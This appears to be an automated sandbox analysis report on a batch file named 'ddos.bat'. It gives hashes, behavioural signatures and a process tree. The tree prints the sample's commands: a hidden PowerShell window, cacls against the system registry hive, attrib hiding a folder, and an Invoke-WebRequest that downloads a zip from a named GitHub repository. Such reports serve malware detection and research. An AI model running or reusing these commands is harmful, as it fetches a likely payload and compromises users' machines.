Analysis
-
max time kernel
1439s -
max time network
1445s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 16:29
Static task
static1
Behavioral task
behavioral1
Sample
ddos.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ddos.bat
Resource
win10v2004-20241007-en
General
-
Target
ddos.bat
-
Size
1KB
-
MD5
15ee8aecfc89d8bed8f362cb46e4b8bb
-
SHA1
c39b884897d73006daa07d29264670d181835624
-
SHA256
7af1c25851ef3f66cbca82540d35470de8a364a469d00a013891bd211f56e082
-
SHA512
553a78c7e82669145767747c287244c2e253a938f7379feaf71425e5f4eeedc612157f812d7d723c3edc57d6f534f152714f173e3b10e55331b16b8f741a3b66
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 2552 powershell.exe 2844 powershell.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 2380 cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2552 powershell.exe 2844 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2552 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 2380 wrote to memory of 2552 2380 cmd.exe 30 PID 2380 wrote to memory of 2552 2380 cmd.exe 30 PID 2380 wrote to memory of 2552 2380 cmd.exe 30 PID 2380 wrote to memory of 2932 2380 cmd.exe 31 PID 2380 wrote to memory of 2932 2380 cmd.exe 31 PID 2380 wrote to memory of 2932 2380 cmd.exe 31 PID 2380 wrote to memory of 2988 2380 cmd.exe 32 PID 2380 wrote to memory of 2988 2380 cmd.exe 32 PID 2380 wrote to memory of 2988 2380 cmd.exe 32 PID 2380 wrote to memory of 2844 2380 cmd.exe 33 PID 2380 wrote to memory of 2844 2380 cmd.exe 33 PID 2380 wrote to memory of 2844 2380 cmd.exe 33 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2932
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD526aaadecff0159d1e75b652c96442e1a
SHA178bad4a599cb00417fca01880fb29df0c8617844
SHA256c47892b44f7d6c36572ba2ed65e855f4e28d9a85e5954913cacf111c70320f2a
SHA512246df204a3d4180297f7e1dfd047600befc558bada110675bb4996d55b17ed4f2629d1e2d71530c9f18f4d76e195e91c874ba952b1a0d6d442001bf51b09c553